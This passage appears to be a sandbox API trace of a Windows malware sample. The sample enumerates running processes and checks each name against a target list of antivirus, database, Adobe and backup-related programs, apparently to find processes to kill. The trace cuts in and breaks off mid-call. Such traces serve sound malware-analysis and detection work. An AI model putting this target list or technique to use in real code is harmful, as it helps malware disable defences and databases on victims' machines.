lstrcmpiA (lpString1="wininit", lpString2="360se") returned 1 [0063.758] lstrcmpiA (lpString1="wininit", lpString2="360doctor") returned 1 [0063.758] lstrcmpiA (lpString1="wininit", lpString2="wdswfsafe") returned 1 [0063.758] lstrcmpiA (lpString1="wininit", lpString2="fdhost") returned 1 [0063.758] lstrcmpiA (lpString1="wininit", lpString2="GDscan") returned 1 [0063.758] lstrcmpiA (lpString1="wininit", lpString2="ZhuDongFangYu") returned -1 [0063.758] lstrcmpiA (lpString1="wininit", lpString2="QBDBMgrN") returned 1 [0063.758] lstrcmpiA (lpString1="wininit", lpString2="sqlwriter") returned 1 [0063.758] lstrcmpiA (lpString1="wininit", lpString2="mysqld") returned 1 [0063.758] lstrcmpiA (lpString1="wininit", lpString2="AutodeskDesktopApp") returned 1 [0063.758] lstrcmpiA (lpString1="wininit", lpString2="acwebbrowser") returned 1 [0063.758] lstrcmpiA (lpString1="wininit", lpString2="Creative Cloud") returned 1 [0063.758] lstrcmpiA (lpString1="wininit", lpString2="Adobe Desktop Service") returned 1 [0063.758] lstrcmpiA (lpString1="wininit", lpString2="CoreSync") returned 1 [0063.758] lstrcmpiA (lpString1="wininit", lpString2="Adobe CEF Helper") returned 1 [0063.758] lstrcmpiA (lpString1="wininit", lpString2="node") returned 1 [0063.758] lstrcmpiA (lpString1="wininit", lpString2="AdobeIPCBroker") returned 1 [0063.758] lstrcmpiA (lpString1="wininit", lpString2="sync-taskbar") returned 1 [0063.759] lstrcmpiA (lpString1="wininit", lpString2="sync-worker") returned 1 [0063.759] lstrcmpiA (lpString1="wininit", lpString2="InputPersonalization") returned 1 [0063.759] lstrcmpiA (lpString1="wininit", lpString2="AdobeCollabSync") returned 1 [0063.759] lstrcmpiA (lpString1="wininit", lpString2="BrCtrlCntr") returned 1 [0063.759] lstrcmpiA (lpString1="wininit", lpString2="BrCcUxSys") returned 1 [0063.759] lstrcmpiA (lpString1="wininit", lpString2="SimplyConnectionManager") returned 1 [0063.759] lstrcmpiA (lpString1="wininit", lpString2="Simply.SystemTrayIcon") returned 1 [0063.759] lstrcmpiA (lpString1="wininit", lpString2="fbguard") returned 1 [0063.759] lstrcmpiA (lpString1="wininit", lpString2="fbserver") returned 1 [0063.759] lstrcmpiA (lpString1="wininit", lpString2="ONENOTEM") returned 1 [0063.759] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x164, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0063.760] PathRemoveExtensionA (in: pszPath="csrss.exe" | out: pszPath="csrss") [0063.760] lstrcmpiA (lpString1="csrss", lpString2="wxServer") returned -1 [0063.760] lstrcmpiA (lpString1="csrss", lpString2="wxServerView") returned -1 [0063.760] lstrcmpiA (lpString1="csrss", lpString2="Sqlservr") returned -1 [0063.760] lstrcmpiA (lpString1="csrss", lpString2="RAgui") returned -1 [0063.760] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x164, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0063.761] PathRemoveExtensionA (in: pszPath="winlogon.exe" | out: pszPath="winlogon") [0063.761] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x16c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0063.762] PathRemoveExtensionA (in: pszPath="services.exe" | out: pszPath="services") [0063.762] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x16c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0063.763] PathRemoveExtensionA (in: pszPath="lsass.exe" | out: pszPath="lsass") [0063.763] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x16c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0063.764] PathRemoveExtensionA (in: pszPath="lsm.exe" | out: pszPath="lsm") [0063.764] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.765] PathRemoveExtensionA (in: pszPath="svchost.exe" | out: pszPath="svchost") [0063.765] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.766] PathRemoveExtensionA (in: pszPath="svchost.exe" | out: pszPath="svchost") [0063.766] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.766] PathRemoveExtensionA (in: pszPath="svchost.exe" | out: pszPath="svchost") [0063.766] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.767] PathRemoveExtensionA (in: pszPath="svchost.exe" | out: pszPath="svchost") [0063.767] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x36, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.768] PathRemoveExtensionA (in: pszPath="svchost.exe" | out: pszPath="svchost") [0063.768] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.769] PathRemoveExtensionA (in: pszPath="svchost.exe" | out: pszPath="svchost") [0063.769] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x32c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0063.770] PathRemoveExtensionA (in: pszPath="dwm.exe" | out: pszPath="dwm") [0063.770] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.771] PathRemoveExtensionA (in: pszPath="svchost.exe" | out: pszPath="svchost") [0063.771] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0063.772] PathRemoveExtensionA (in: pszPath="spoolsv.exe" | out: pszPath="spoolsv") [0063.772] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x484, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0063.773] PathRemoveExtensionA (in: pszPath="taskhost.exe" | out: pszPath="taskhost") [0063.773] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.774] PathRemoveExtensionA (in: pszPath="svchost.exe" | out: pszPath="svchost") [0063.774] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0063.775] PathRemoveExtensionA (in: pszPath="OfficeClickToRun.exe" | out: pszPath="OfficeClickToRun") [0063.775] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x77c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0063.776] PathRemoveExtensionA (in: pszPath="explorer.exe" | out: pszPath="explorer") [0063.776] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x264, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0063.777] PathRemoveExtensionA (in: pszPath="WMIADAP.exe" | out: pszPath="WMIADAP") [0063.777] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c4, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0063.777] PathRemoveExtensionA (in: pszPath="taskhost.exe" | out: pszPath="taskhost") [0063.777] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x244, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0063.778] PathRemoveExtensionA (in: pszPath="WmiPrvSE.exe" | out: pszPath="WmiPrvSE") [0063.778] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.779] PathRemoveExtensionA (in: pszPath="svchost.exe" | out: pszPath="svchost") [0063.779] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0063.780] PathRemoveExtensionA (in: pszPath="iexplore.exe" | out: pszPath="iexplore") [0063.780] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x844, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x50c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0063.781] PathRemoveExtensionA (in: pszPath="iexplore.exe" | out: pszPath="iexplore") [0063.781] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0063.782] PathRemoveExtensionA (in: pszPath="sppsvc.exe" | out: pszPath="sppsvc") [0063.782] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="teach perform official.exe")) returned 1 [0063.783] PathRemoveExtensionA (in: pszPath="teach perform official.exe" | out: pszPath="teach perform official") [0063.783] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="consider.exe")) returned 1 [0063.783] PathRemoveExtensionA (in: pszPath="consider.exe" | out: pszPath="consider") [0063.783] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="questioncollection.exe")) returned 1 [0063.784] PathRemoveExtensionA (in: pszPath="questioncollection.exe" | out: pszPath="questioncollection") [0063.784] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="here.exe")) returned 1 [0063.785] PathRemoveExtensionA (in: pszPath="here.exe" | out: pszPath="here") [0063.785] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="box for.exe")) returned 1 [0063.786] PathRemoveExtensionA (in: pszPath="box for.exe" | out: pszPath="box for") [0063.786] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="relate.exe")) returned 1 [0063.787] PathRemoveExtensionA (in: pszPath="relate.exe" | out: pszPath="relate") [0063.787] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="billion.exe")) returned 1 [0063.932] PathRemoveExtensionA (in: pszPath="billion.exe" | out: pszPath="billion") [0063.933] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="optiondarkarticle.exe")) returned 1 [0063.933] PathRemoveExtensionA (in: pszPath="optiondarkarticle.exe" | out: pszPath="optiondarkarticle") [0063.933] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="know ready.exe")) returned 1 [0063.934] PathRemoveExtensionA (in: pszPath="know ready.exe" | out: pszPath="know ready") [0063.934] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="be_always.exe")) returned 1 [0063.935] PathRemoveExtensionA (in: pszPath="be_always.exe" | out: pszPath="be_always") [0063.935] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="book-body.exe")) returned 1 [0063.935] PathRemoveExtensionA (in: pszPath="book-body.exe" | out: pszPath="book-body") [0063.935] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="president dead.exe")) returned 1 [0063.936] PathRemoveExtensionA (in: pszPath="president dead.exe" | out: pszPath="president dead") [0063.936] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="technology.exe")) returned 1 [0063.937] PathRemoveExtensionA (in: pszPath="technology.exe" | out: pszPath="technology") [0063.937] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="cut_machine.exe")) returned 1 [0063.937] PathRemoveExtensionA (in: pszPath="cut_machine.exe" | out: pszPath="cut_machine") [0063.938] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="successfulsecond.exe")) returned 1 [0063.938] PathRemoveExtensionA (in: pszPath="successfulsecond.exe" | out: pszPath="successfulsecond") [0063.938] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0063.939] PathRemoveExtensionA (in: pszPath="far.exe" | out: pszPath="far") [0063.939] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="reason.exe")) returned 1 [0063.940] PathRemoveExtensionA (in: pszPath="reason.exe" | out: pszPath="reason") [0063.940] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="travel.exe")) returned 1 [0063.940] PathRemoveExtensionA (in: pszPath="travel.exe" | out: pszPath="travel") [0063.941] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0063.941] PathRemoveExtensionA (in: pszPath="notepad.exe" | out: pszPath="notepad") [0063.941] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0063.942] PathRemoveExtensionA (in: pszPath="far.exe" | out: pszPath="far") [0063.942] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0063.943] PathRemoveExtensionA (in: pszPath="filezilla.exe" | out: pszPath="filezilla") [0063.943] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0063.946] PathRemoveExtensionA (in: pszPath="flashfxp.exe" | out: pszPath="flashfxp") [0063.946] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0063.946] PathRemoveExtensionA (in: pszPath="fling.exe" | out: pszPath="fling") [0063.947] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0063.947] PathRemoveExtensionA (in: pszPath="foxmailincmail.exe" | out: pszPath="foxmailincmail") [0063.947] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0063.948] PathRemoveExtensionA (in: pszPath="gmailnotifierpro.exe" | out: pszPath="gmailnotifierpro") [0063.948] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0063.949] PathRemoveExtensionA (in: pszPath="icq.exe" | out: pszPath="icq") [0063.949] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0063.949] PathRemoveExtensionA (in: pszPath="leechftp.exe" | out: pszPath="leechftp") [0063.949] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0063.950] PathRemoveExtensionA (in: pszPath="ncftp.exe" | out: pszPath="ncftp") [0063.950] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x420, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0063.951] PathRemoveExtensionA (in: pszPath="operamail.exe" | out: pszPath="operamail") [0063.951] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0063.952] PathRemoveExtensionA (in: pszPath="outlook.exe" | out: pszPath="outlook") [0063.952] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0063.953] PathRemoveExtensionA (in: pszPath="coreftp.exe" | out: pszPath="coreftp") [0063.953] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x900, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0063.954] PathRemoveExtensionA (in: pszPath="bitkinex.exe" | out: pszPath="bitkinex") [0063.954] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x87c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0063.955] PathRemoveExtensionA (in: pszPath="barca.exe" | out: pszPath="barca") [0063.955] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x94c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0063.956] PathRemoveExtensionA (in: pszPath="alftp.exe" | out: pszPath="alftp") [0063.956] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0063.957] PathRemoveExtensionA (in: pszPath="absolutetelnet.exe" | out: pszPath="absolutetelnet") [0063.957] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x95c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0063.959] PathRemoveExtensionA (in: pszPath="3dftp.exe" | out: pszPath="3dftp") [0063.959] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="poor_language_surface.exe")) returned 1 [0063.960] PathRemoveExtensionA (in: 